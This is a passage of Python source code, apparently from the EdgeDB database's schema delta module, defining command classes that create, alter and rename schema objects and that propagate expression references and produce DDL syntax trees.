prompt_text = f'did you {desc}?'
prompt_id = get_object_command_id(self)
assert prompt_id is not None
return prompt_id, prompt_text
def validate_object(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
pass
@classmethod
def get_parent_op(
cls,
context: CommandContext,
) -> ObjectCommand[so.Object]:
parent = context.parent()
if parent is None:
raise AssertionError(f'{cls!r} has no parent context')
op = parent.op
assert isinstance(op, ObjectCommand)
return op
@classmethod
@functools.lru_cache()
def _get_special_handler(
cls,
field_name: str,
) -> Optional[Type[AlterSpecialObjectField[so.Object]]]:
if (
issubclass(cls, AlterObjectOrFragment)
and not issubclass(cls, AlterSpecialObjectField)
):
schema_cls = cls.get_schema_metaclass()
return get_special_field_alter_handler(field_name, schema_cls)
else:
return None
def set_attribute_value(
self,
attr_name: str,
value: Any,
*,
orig_value: Any = None,
inherited: bool = False,
orig_inherited: Optional[bool] = None,
computed: bool = False,
orig_computed: Optional[bool] = None,
from_default: bool = False,
source_context: Optional[parsing.ParserContext] = None,
) -> Command:
special = type(self)._get_special_handler(attr_name)
op = self._get_attribute_set_cmd(attr_name)
top_op: Optional[Command] = None
if orig_inherited is None:
orig_inherited = inherited
if orig_computed is None:
orig_computed = computed
if op is None:
op = AlterObjectProperty(
property=attr_name,
new_value=value,
old_value=orig_value,
new_inherited=inherited,
old_inherited=orig_inherited,
new_computed=computed,
old_computed=orig_computed,
from_default=from_default,
source_context=source_context,
)
top_op = self._special_attrs.get(attr_name)
if top_op is None and special is not None:
top_op = special(classname=self.classname)
self.add(top_op)
if top_op:
top_op.add(op)
else:
self.add(op)
top_op = op
return top_op
else:
op.new_value = value
op.new_inherited = inherited
op.old_inherited = orig_inherited
op.new_computed = computed
op.old_computed = orig_computed
op.from_default = from_default
if source_context is not None:
op.source_context = source_context
if orig_value is not None:
op.old_value = orig_value
return op
def _propagate_if_expr_refs(
self,
schema: s_schema.Schema,
context: CommandContext,
action: str,
fixer: Optional[
Callable[[s_schema.Schema, ObjectCommand[so.Object], str,
CommandContext, s_expr.Expression],
s_expr.Expression]
]=None,
metadata_only: bool=True,
) -> s_schema.Schema:
scls = self.scls
expr_refs = s_expr.get_expr_referrers(schema, scls)
if expr_refs:
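            # Referrers are processed in dependency order; a cycle here
            # indicates mutually recursive expression definitions, which is
            # reported as an error.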
try:
sorted_ref_objs = sort_by_cross_refs(schema, expr_refs.keys())
except topological.CycleError as e:
assert e.item is not None
assert e.path is not None
item_vn = e.item.get_verbosename(schema, with_parent=True)
if len(e.path):
# Recursion involving more than one schema object.
rec_vn = e.path[-1].get_verbosename(
schema, with_parent=True)
msg = (
f'definition dependency cycle between {rec_vn} '
f'and {item_vn}'
)
else:
# A single schema object with a recursive definition.
msg = f'{item_vn} is defined recursively'
raise errors.InvalidDefinitionError(msg) from e
ref_desc = []
for ref in sorted_ref_objs:
cmd_drop: Command
cmd_create: Command
fns = expr_refs[ref]
this_ref_desc = []
for fn in fns:
if fn == 'expr':
fdesc = 'expression'
else:
fdesc = f"{fn.replace('_', ' ')} expression"
vn = ref.get_verbosename(schema, with_parent=True)
this_ref_desc.append(f'{fdesc} of {vn}')
# Alter the affected entity to change the body to
# a dummy version (removing the dependency) and
# then reset the body to original expression.
delta_drop, cmd_drop, _ = ref.init_delta_branch(
schema, context, cmdtype=AlterObject)
delta_create, cmd_create, _ = ref.init_delta_branch(
schema, context, cmdtype=AlterObject)
# Mark it metadata_only so that if it actually gets
# applied, only the metadata is changed but not
# the real underlying schema.
if metadata_only:
cmd_drop.metadata_only = True
cmd_create.metadata_only = True
try:
# Compute a dummy value
dummy = cmd_create.get_dummy_expr_field_value(
schema,
context,
field=type(ref).get_field(fn),
value=ref.get_field_value(schema, fn)
)
except NotImplementedError:
ref_desc.extend(this_ref_desc)
else:
# We need to extract the command on whatever the
# enclosing object of our referrer is, since we
# need to put that in the context so that
# compile_expr_field calls in the fixer can find
# the subject.
obj_cmd = next(iter(delta_create.ops))
assert isinstance(obj_cmd, ObjectCommand)
obj = obj_cmd.get_object(schema, context)
for fn in fns:
# Do the switcheroos
value = ref.get_explicit_field_value(schema, fn, None)
if value is None:
continue
assert isinstance(value, s_expr.Expression)
# Strip the "compiled" out of the expression
value = s_expr.Expression.not_compiled(value)
if fixer:
with obj_cmd.new_context(schema, context, obj):
value = fixer(
schema, cmd_create, fn, context, value)
cmd_drop.set_attribute_value(fn, dummy)
cmd_create.set_attribute_value(fn, value)
context.affected_finalization[self].append(
(delta_create, cmd_create, this_ref_desc)
)
schema = delta_drop.apply(schema, context)
if ref_desc:
expr_s = (
'an expression' if len(ref_desc) == 1 else 'expressions')
ref_desc_s = "\n - " + "\n - ".join(ref_desc)
raise errors.SchemaDefinitionError(
f'cannot {action} because it is used in {expr_s}',
details=(
f'{scls.get_verbosename(schema)} is used in:'
f'{ref_desc_s}'
)
)
return schema
def _finalize_affected_refs(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
# There might be dependencies between the things we need to
# fix up (a computed property and a constraint on it, for
# example, requires us to fix up the computed property first),
# so sort by dependency order.
objs_to_cmds = {}
for delta, cmd, refdesc in context.affected_finalization.get(self, []):
objs_to_cmds[cmd.scls] = delta, cmd, refdesc
objs = sort_by_cross_refs(schema, objs_to_cmds.keys())
for obj in reversed(objs):
delta, cmd, refdesc = objs_to_cmds[obj]
try:
cmd.canonicalize_alter_from_external_ref(schema, context)
schema = delta.apply(schema, context)
if not context.canonical and delta:
# We need to force the attributes to be resolved so
# that expressions get compiled *now* under a schema
# where they are correct, and not later, when more
# renames may have broken them.
assert isinstance(cmd, ObjectCommand)
for key, value in cmd.get_resolved_attributes(
schema, context).items():
cmd.set_attribute_value(key, value)
self.add(delta)
except errors.QueryError as e:
desc = self.get_friendly_description(schema=schema)
raise errors.SchemaDefinitionError(
f'cannot {desc} because this affects'
f' {" and ".join(refdesc)}',
details=e.args[0],
) from e
return schema
def _get_computed_status_of_fields(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, bool]:
result = {}
mcls = self.get_schema_metaclass()
for op in self._enumerate_attribute_cmds():
field = mcls.get_field(op.property)
if not field.ephemeral:
result[op.property] = op.new_computed
return result
def _update_computed_fields(
self,
schema: s_schema.Schema,
context: CommandContext,
update: Mapping[str, bool],
) -> None:
cur_comp_fields = self.scls.get_computed_fields(schema)
comp_fields = set(cur_comp_fields)
for fn, computed in update.items():
if computed:
comp_fields.add(fn)
else:
comp_fields.discard(fn)
if cur_comp_fields != comp_fields:
if comp_fields:
self.set_attribute_value(
'computed_fields',
frozenset(comp_fields),
orig_value=cur_comp_fields if cur_comp_fields else None,
)
else:
self.set_attribute_value(
'computed_fields',
None,
orig_value=cur_comp_fields if cur_comp_fields else None,
)
def _append_subcmd_ast(
self,
schema: s_schema.Schema,
node: qlast.DDLOperation,
subcmd: Command,
context: CommandContext,
) -> None:
subnode = subcmd.get_ast(schema, context, parent_node=node)
if subnode is not None:
node.commands.append(subnode)
def _get_ast_node(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Type[qlast.DDLOperation]:
# TODO: how to handle the following type: ignore?
# in this class, astnode is always a Type[DDLOperation],
# but the current design of constraints handles it as
# a List[Type[DDLOperation]]
return type(self).astnode # type: ignore
def _deparse_name(
self,
schema: s_schema.Schema,
context: CommandContext,
name: sn.Name,
) -> qlast.ObjectRef:
qlclass = self.get_schema_metaclass().get_ql_class()
if isinstance(name, sn.QualName):
nname = sn.shortname_from_fullname(name)
assert isinstance(nname, sn.QualName), \
"expected qualified name"
ref = qlast.ObjectRef(
module=nname.module, name=nname.name, itemclass=qlclass)
else:
ref = qlast.ObjectRef(module='', name=str(name), itemclass=qlclass)
return ref
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
astnode = self._get_ast_node(schema, context)
if astnode.get_field('name'):
name = context.early_renames.get(self.classname, self.classname)
op = astnode( # type: ignore
name=self._deparse_name(schema, context, name),
)
else:
op = astnode()
self._apply_fields_ast(schema, context, op)
return op
def _apply_fields_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
node: qlast.DDLOperation,
) -> None:
mcls = self.get_schema_metaclass()
if not isinstance(self, DeleteObject):
fops = self.get_subcommands(type=AlterObjectProperty)
for fop in sorted(fops, key=lambda f: f.property):
field = mcls.get_field(fop.property)
if fop.new_value is not None:
new_value = fop.new_value
else:
new_value = field.get_default()
if (
(
# Only include fields that are not inherited
# and that have their value actually changed.
not fop.new_inherited
or context.descriptive_mode
or self.ast_ignore_ownership()
)
and (
fop.old_value != new_value
or fop.old_inherited != fop.new_inherited
or fop.old_computed != fop.new_computed
)
):
self._apply_field_ast(schema, context, node, fop)
if not isinstance(self, AlterObjectFragment):
for field in self.get_ddl_identity_fields(context):
ast_attr = self.get_ast_attr_for_field(field.name, type(node))
if (
ast_attr is not None
and not getattr(node, ast_attr, None)
and (
field.required
or self.has_ddl_identity(field.name)
)
):
ddl_id = self.get_ddl_identity(field.name)
if issubclass(field.type, s_expr.Expression):
attr_val = ddl_id.qlast
elif issubclass(field.type, s_expr.ExpressionList):
attr_val = [e.qlast for e in ddl_id]
else:
raise AssertionError(
f'unexpected type of ddl_identity'
f' field: {field.type!r}'
)
setattr(node, ast_attr, attr_val)
# Keep subcommands from refdicts and alter fragments (like
# rename, rebase) in order when producing DDL asts
refdicts = tuple(x.ref_cls for x in mcls.get_refdicts())
for op in self.get_subcommands():
if (
isinstance(op, AlterObjectFragment)
or (isinstance(op, ObjectCommand) and
issubclass(op.get_schema_metaclass(), refdicts))
):
self._append_subcmd_ast(schema, node, op, context)
else:
for op in self.get_subcommands(type=AlterObjectFragment):
self._append_subcmd_ast(schema, node, op, context)
if isinstance(node, qlast.DropObject):
# Deletes in the AST shouldn't have subcommands, so we
# drop them. To try to make sure we aren't papering
            # over bugs by dropping things we don't expect, make
# sure every subcommand was also a delete.
assert all(
isinstance(sub, qlast.DropObject) for sub in node.commands)
node.commands = []
def _apply_field_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
node: qlast.DDLOperation,
op: AlterObjectProperty,
) -> None:
if op.property != 'name':
subnode = op._get_ast(schema, context, parent_node=node)
if subnode is not None:
node.commands.append(subnode)
def get_ast_attr_for_field(
self,
field: str,
astnode: Type[qlast.DDLOperation],
) -> Optional[str]:
return None
def get_ddl_identity_fields(
self,
context: CommandContext,
) -> Tuple[so.Field[Any], ...]:
mcls = self.get_schema_metaclass()
return tuple(f for f in mcls.get_fields().values() if f.ddl_identity)
@classmethod
def maybe_get_schema_metaclass(cls) -> Optional[Type[so.Object_T]]:
return cls._schema_metaclass
@classmethod
def get_schema_metaclass(cls) -> Type[so.Object_T]:
if cls._schema_metaclass is None:
raise TypeError(f'schema metaclass not set for {cls}')
return cls._schema_metaclass
@classmethod
def get_other_command_class(
cls,
cmdtype: Type[ObjectCommand_T],
) -> Type[ObjectCommand_T]:
mcls = cls.get_schema_metaclass()
return get_object_command_class_or_die(cmdtype, mcls)
def _validate_legal_command(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
from . import functions as s_func
if (not context.stdmode and not context.testmode and
not isinstance(self, s_func.ParameterCommand)):
if (
isinstance(self.classname, sn.QualName)
and (
(modname := self.classname.get_module_name())
in s_schema.STD_MODULES
)
):
raise errors.SchemaDefinitionError(
f'cannot {self._delta_action} {self.get_verbosename()}: '
f'module {modname} is read-only',
context=self.source_context)
def get_verbosename(self, parent: Optional[str] = None) -> str:
mcls = self.get_schema_metaclass()
return mcls.get_verbosename_static(self.classname, parent=parent)
def get_displayname(self) -> str:
mcls = self.get_schema_metaclass()
return mcls.get_displayname_static(self.classname)
def get_friendly_object_name_for_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Optional[so.Object_T] = None,
object_desc: Optional[str] = None,
) -> str:
if object_desc is not None:
return object_desc
else:
if object is None:
object = getattr(self, 'scls', _dummy_object)
if object is _dummy_object or schema is None:
if not isinstance(parent_op, ObjectCommand):
parent_desc = None
else:
parent_desc = parent_op.get_verbosename()
object_desc = self.get_verbosename(parent=parent_desc)
else:
object_desc = object.get_verbosename(schema, with_parent=True)
return object_desc
@overload
def get_object(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
) -> so.Object_T:
...
@overload
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: None = None,
) -> Optional[so.Object_T]:
...
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[so.Object_T, so.NoDefaultT, None] = so.NoDefault,
) -> Optional[so.Object_T]:
metaclass = self.get_schema_metaclass()
if name is None:
name = self.classname
rename = context.renames.get(name)
if rename is not None:
name = rename
return schema.get_global(metaclass, name, default=default)
def canonicalize_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
"""Resolve, canonicalize and amend field mutations in this command.
This is called just before the object described by this command
        is created or updated but after all prerequisite commands have
been applied, so it is safe to resolve object shells and do
other schema inquiries here.
"""
return schema
def populate_ddl_identity(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def get_resolved_attribute_value(
self,
attr_name: str,
*,
schema: s_schema.Schema,
context: CommandContext,
) -> Any:
raw_value = self.get_attribute_value(attr_name)
if raw_value is None:
return None
value = context.get_cached((self, 'attribute', attr_name))
if value is None:
value = self.resolve_attribute_value(
attr_name,
raw_value,
schema=schema,
context=context,
)
context.cache_value((self, 'attribute', attr_name), value)
return value
def resolve_attribute_value(
self,
attr_name: str,
raw_value: Any,
*,
schema: s_schema.Schema,
context: CommandContext,
) -> Any:
metaclass = self.get_schema_metaclass()
field = metaclass.get_field(attr_name)
if field is None:
raise errors.SchemaDefinitionError(
f'got AlterObjectProperty command for '
f'invalid field: {metaclass.__name__}.{attr_name}')
value = self._resolve_attr_value(
raw_value, attr_name, field, schema)
if (isinstance(value, s_expr.Expression)
and not value.is_compiled()):
value = self.compile_expr_field(schema, context, field, value)
return value
def get_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, Any]:
result = {}
for attr in self.enumerate_attributes():
result[attr] = self.get_attribute_value(attr)
return result
def get_resolved_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, Any]:
result = {}
for attr in self.enumerate_attributes():
result[attr] = self.get_resolved_attribute_value(
attr, schema=schema, context=context)
return result
def get_orig_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, Any]:
result = {}
for attr in self.enumerate_attributes():
result[attr] = self.get_orig_attribute_value(attr)
return result
def get_specified_attribute_value(
self,
field: str,
schema: s_schema.Schema,
context: CommandContext,
) -> Optional[Any]:
"""Fetch the specified (not computed) value of a field.
If the command is an alter, it will fall back to the value in
the schema.
Return None if there is no specified value or if the specified
value is being reset.
"""
spec = self.get_attribute_value(field)
is_alter = (
isinstance(self, AlterObject)
or (
isinstance(self, AlterObjectFragment)
and isinstance(self.get_parent_op(context), AlterObject)
)
)
if (
is_alter
and spec is None
and not self.has_attribute_value(field)
and field not in self.scls.get_computed_fields(schema)
):
spec = self.scls.get_explicit_field_value(
schema, field, default=None)
return spec
def compile_expr_field(
self,
schema: s_schema.Schema,
context: CommandContext,
field: so.Field[Any],
value: Any,
track_schema_ref_exprs: bool=False,
) -> s_expr.Expression:
cdn = self.get_schema_metaclass().get_schema_class_displayname()
raise errors.InternalServerError(
f'uncompiled expression in the field {field.name!r} of '
f'{cdn} {self.classname!r}'
)
def get_dummy_expr_field_value(
self,
schema: s_schema.Schema,
context: CommandContext,
field: so.Field[Any],
value: Any,
) -> Optional[s_expr.Expression]:
"""Return a dummy value for an expression stored in *field*.
        Schema class command implementations should override this
to specify a dummy value for an expression field, which is necessary
when doing dependency type and name propagation switcheroo in
_propagate_if_expr_refs() / _finalize_affected_refs().
"""
raise NotImplementedError
def _create_begin(
self, schema: s_schema.Schema, context: CommandContext
) -> s_schema.Schema:
raise NotImplementedError
def new_context(
self: ObjectCommand[so.Object_T],
schema: s_schema.Schema,
context: CommandContext,
scls: so.Object_T,
) -> CommandContextWrapper[ObjectCommand[so.Object_T]]:
ctxcls = type(self).get_context_class()
assert ctxcls is not None
return context(
ctxcls(schema=schema, op=self, scls=scls), # type: ignore
)
def get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
dummy = cast(so.Object_T, _dummy_object)
context_class = type(self).get_context_class()
if context_class is not None:
with self.new_context(schema, context, dummy):
return self._get_ast(schema, context, parent_node=parent_node)
else:
return self._get_ast(schema, context, parent_node=parent_node)
def get_ddl_identity(self, aspect: str) -> Any:
if self.ddl_identity is None:
raise LookupError(f'{self!r} has no DDL identity information')
value = self.ddl_identity.get(aspect)
if value is None:
raise LookupError(f'{self!r} has no {aspect!r} in DDL identity')
return value
def has_ddl_identity(self, aspect: str) -> bool:
return (
self.ddl_identity is not None
and self.ddl_identity.get(aspect) is not None
)
def set_ddl_identity(self, aspect: str, value: Any) -> None:
if self.ddl_identity is None:
self.ddl_identity = {}
self.ddl_identity[aspect] = value
def maybe_get_object_aux_data(self, field: str) -> Any:
if self.aux_object_data is None:
return None
else:
value = self.aux_object_data.get(field)
if value is None:
return None
else:
return value
def get_object_aux_data(self, field: str) -> Any:
if self.aux_object_data is None:
raise LookupError(f'{self!r} has no auxiliary object information')
value = self.aux_object_data.get(field)
if value is None:
raise LookupError(
f'{self!r} has no {field!r} in auxiliary object information')
return value
def has_object_aux_data(self, field: str) -> bool:
return (
self.aux_object_data is not None
and self.aux_object_data.get(field) is not None
)
def set_object_aux_data(self, field: str, value: Any) -> None:
if self.aux_object_data is None:
self.aux_object_data = {}
self.aux_object_data[field] = value
def get_annotation(self, name: str) -> Any:
if self.annotations is None:
return None
else:
return self.annotations.get(name)
def set_annotation(self, name: str, value: Any) -> None:
if self.annotations is None:
self.annotations = {}
self.annotations[name] = value
def ast_ignore_ownership(self) -> bool:
"""Whether to force generating an AST even though it isn't owned"""
return False
class ObjectCommandContext(CommandContextToken[ObjectCommand[so.Object_T]]):
def __init__(
self,
schema: s_schema.Schema,
op: ObjectCommand[so.Object_T],
scls: so.Object_T,
*,
modaliases: Optional[Mapping[Optional[str], str]] = None,
localnames: AbstractSet[str] = frozenset(),
) -> None:
super().__init__(
schema, op, modaliases=modaliases, localnames=localnames)
self.scls = scls
class QualifiedObjectCommand(ObjectCommand[so.QualifiedObject_T]):
classname = struct.Field(sn.QualName)
@classmethod
def _classname_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: CommandContext,
) -> sn.QualName:
objref = astnode.name
module = context.modaliases.get(objref.module, objref.module)
if module is None:
raise errors.SchemaDefinitionError(
f'unqualified name and no default module set',
context=objref.context,
)
return sn.QualName(module=module, name=objref.name)
@overload
def get_object(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[so.QualifiedObject_T, so.NoDefaultT] = so.NoDefault,
) -> so.QualifiedObject_T:
...
@overload
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: None = None,
) -> Optional[so.QualifiedObject_T]:
...
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[
so.QualifiedObject_T, so.NoDefaultT, None] = so.NoDefault,
) -> Optional[so.QualifiedObject_T]:
if name is None:
name = self.classname
rename = context.renames.get(name)
if rename is not None:
name = rename
metaclass = self.get_schema_metaclass()
return cast(
Optional[so.QualifiedObject_T],
schema.get(name, type=metaclass, default=default,
sourcectx=self.source_context),
)
class GlobalObjectCommand(ObjectCommand[so.GlobalObject_T]):
pass
class ExternalObjectCommand(ObjectCommand[so.ExternalObject_T]):
pass
class CreateObject(ObjectCommand[so.Object_T], Generic[so.Object_T]):
_delta_action = 'create'
# If the command is conditioned with IF NOT EXISTS
if_not_exists = struct.Field(bool, default=False)
def is_data_safe(self) -> bool:
# Creations are always data-safe.
return True
@classmethod
def command_for_ast_node(
cls,
astnode: qlast.DDLOperation,
schema: s_schema.Schema,
context: CommandContext,
) -> Type[ObjectCommand[so.Object_T]]:
assert isinstance(astnode, qlast.CreateObject), "expected CreateObject"
if astnode.sdl_alter_if_exists:
modaliases = cls._modaliases_from_ast(schema, astnode, context)
dummy_op = cls(
classname=sn.QualName('placeholder', 'placeholder'))
ctxcls = cast(
Type[ObjectCommandContext[so.Object_T]],
cls.get_context_class_or_die(),
)
ctx = ctxcls(
schema,
op=dummy_op,
scls=cast(so.Object_T, _dummy_object),
modaliases=modaliases,
)
with context(ctx):
classname = cls._classname_from_ast(schema, astnode, context)
mcls = cls.get_schema_metaclass()
if schema.get(classname, default=None) is not None:
return get_object_command_class_or_die(
AlterObject, mcls)
return cls
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(astnode, qlast.CreateObject)
assert isinstance(cmd, CreateObject)
cmd.if_not_exists = astnode.create_if_not_exists
cmd.set_attribute_value('name', cmd.classname)
if getattr(astnode, 'abstract', False):
cmd.set_attribute_value('abstract', True)
return cmd
def get_verb(self) -> str:
return 'create'
def validate_create(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
pass
def _create_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
self._validate_legal_command(schema, context)
for op in self.get_prerequisites():
schema = op.apply(schema, context)
if context.schema_object_ids is not None:
mcls = self.get_schema_metaclass()
qlclass: Optional[qltypes.SchemaObjectClass]
if issubclass(mcls, so.QualifiedObject):
qlclass = None
else:
qlclass = mcls.get_ql_class_or_die()
objname = self.classname
if context.compat_ver_is_before(
(1, 0, verutils.VersionStage.ALPHA, 5)
):
# Pre alpha.5 used to have a different name mangling scheme.
objname = sn.compat_name_remangle(str(objname))
key = (objname, qlclass)
specified_id = context.schema_object_ids.get(key)
if specified_id is not None:
self.set_attribute_value('id', specified_id)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
self.validate_create(schema, context)
computed_status = self._get_computed_status_of_fields(
schema, context)
computed_fields = {n for n, v in computed_status.items() if v}
if computed_fields:
self.set_attribute_value(
'computed_fields', frozenset(computed_fields))
props = self.get_resolved_attributes(schema, context)
metaclass = self.get_schema_metaclass()
# Check if functions by this name exist
fn = props.get('name')
if fn is not None and not sn.is_fullname(str(fn)):
funcs = schema.get_functions(fn, tuple())
if funcs:
raise errors.SchemaError(
f'{funcs[0].get_verbosename(schema)} is already present '
f'in the schema {schema!r}')
schema, self.scls = metaclass.create_in_schema(schema, **props)
if not props.get('id'):
# Record the generated ID.
self.set_attribute_value('id', self.scls.id)
return schema
def canonicalize_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = super().canonicalize_attributes(schema, context)
        if not self.has_attribute_value('builtin'):
            self.set_attribute_value('builtin', context.stdmode)
if not self.has_attribute_value('internal'):
self.set_attribute_value('internal', context.internal_schema_mode)
return schema
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
node = super()._get_ast(schema, context, parent_node=parent_node)
if node is not None and self.if_not_exists:
assert isinstance(node, qlast.CreateObject)
node.create_if_not_exists = True
return node
def _create_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(include_prerequisites=False):
if not isinstance(op, AlterObjectProperty):
schema = op.apply(schema, context=context)
return schema
def _create_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if not context.canonical:
self.validate_object(schema, context)
return schema
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
with self.new_context(schema, context, _dummy_object): # type: ignore
if self.if_not_exists:
scls = self.get_object(schema, context, default=None)
if scls is not None:
parent_ctx = context.parent()
if parent_ctx is not None and not self.canonical:
parent_ctx.op.discard(self)
self.scls = scls
return schema
schema = self._create_begin(schema, context)
ctx = context.current()
objctx = cast(ObjectCommandContext[so.Object_T], ctx)
objctx.scls = self.scls
schema = self._create_innards(schema, context)
schema = self._create_finalize(schema, context)
return schema
class CreateExternalObject(
CreateObject[so.ExternalObject_T],
ExternalObjectCommand[so.ExternalObject_T],
):
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
with self.new_context(schema, context, _dummy_object): # type: ignore
if self.if_not_exists:
raise NotImplementedError(
'if_not_exists not implemented for external objects')
schema = self._create_begin(schema, context)
schema = self._create_innards(schema, context)
schema = self._create_finalize(schema, context)
return schema
def _create_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
self._validate_legal_command(schema, context)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
self.validate_create(schema, context)
computed_status = self._get_computed_status_of_fields(
schema, context)
computed_fields = {n for n, v in computed_status.items() if v}
if computed_fields:
self.set_attribute_value(
'computed_fields', frozenset(computed_fields))
props = self.get_resolved_attributes(schema, context)
metaclass = self.get_schema_metaclass()
obj_id = props.get('id')
if obj_id is None:
obj_id = metaclass._prepare_id(schema, props)
self.set_attribute_value('id', obj_id)
self.scls = metaclass._create_from_id(obj_id)
return schema
class AlterObjectOrFragment(ObjectCommand[so.Object_T]):
def canonicalize_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = super().canonicalize_attributes(schema, context)
# Hydrate the ALTER fields with original field values,
# if not present.
for cmd in self.get_subcommands(type=AlterObjectProperty):
if cmd.old_value is None:
cmd.old_value = self.scls.get_explicit_field_value(
schema, cmd.property, default=None)
return schema
def validate_alter(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
self._validate_legal_command(schema, context)
def _alter_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_prerequisites():
schema = op.apply(schema, context)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
computed_status = self._get_computed_status_of_fields(
schema, context)
self._update_computed_fields(schema, context, computed_status)
self.validate_alter(schema, context)
props = self.get_resolved_attributes(schema, context)
return self.scls.update(schema, props)
def _alter_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(include_prerequisites=False):
if not isinstance(op, AlterObjectProperty):
schema = op.apply(schema, context=context)
return schema
def _alter_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = self._finalize_affected_refs(schema, context)
if not context.canonical:
self.validate_object(schema, context)
return schema
class AlterObjectFragment(AlterObjectOrFragment[so.Object_T]):
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
# AlterObjectFragment must be executed in the context
# of a parent AlterObject command.
scls = self.get_parent_op(context).scls
self.scls = cast(so.Object_T, scls)
schema = self._alter_begin(schema, context)
schema = self._alter_innards(schema, context)
schema = self._alter_finalize(schema, context)
return schema
@classmethod
def get_parent_op(
cls,
context: CommandContext,
) -> ObjectCommand[so.Object]:
op = context.current().op
assert isinstance(op, ObjectCommand)
return op
class RenameObject(AlterObjectFragment[so.Object_T]):
_delta_action = 'rename'
astnode = qlast.Rename
new_name = struct.Field(sn.Name)
def is_data_safe(self) -> bool:
# Renames are always data-safe.
return True
def get_verb(self) -> str:
return 'rename'
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
object_desc = self.get_friendly_object_name_for_description(
parent_op=parent_op,
schema=schema,
object=object,
object_desc=object_desc,
)
mcls = self.get_schema_metaclass()
new_name = mcls.get_displayname_static(self.new_name)
return f"rename {object_desc} to '{new_name}'"
def _fix_referencing_expr(
self,
schema: s_schema.Schema,
cmd: ObjectCommand[so.Object],
fn: str,
context: CommandContext,
expr: s_expr.Expression,
) -> s_expr.Expression:
from edb.ir import ast as irast
# Recompile the expression with reference tracking on so that we
# can clean up the ast.
field = cmd.get_schema_metaclass().get_field(fn)
compiled = cmd.compile_expr_field(
schema, context, field, expr,
track_schema_ref_exprs=True)
assert isinstance(compiled.irast, irast.Statement)
assert compiled.irast.schema_ref_exprs is not None
# Now that the compilation is done, try to do the fixup.
new_shortname = sn.shortname_from_fullname(self.new_name)
old_shortname = sn.shortname_from_fullname(self.classname).name
for ref in compiled.irast.schema_ref_exprs.get(self.scls, []):
if isinstance(ref, qlast.Ptr):
ref = ref.ptr
assert isinstance(ref, (qlast.ObjectRef, qlast.FunctionCall)), (
f"only support object refs and func calls but got {ref}")
if isinstance(ref, qlast.FunctionCall):
ref.func = ((new_shortname.module, new_shortname.name)
if isinstance(new_shortname, sn.QualName)
else new_shortname.name)
elif (
isinstance(ref, qlast.ObjectRef)
and ref.name == old_shortname
):
ref.name = new_shortname.name
if (
isinstance(new_shortname, sn.QualName)
and new_shortname.module != "__"
):
ref.module = new_shortname.module
# say as_fragment=True as a hack to avoid renormalizing it
out = s_expr.Expression.from_ast(
compiled.qlast, schema, modaliases={}, as_fragment=True)
return out
def _alter_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
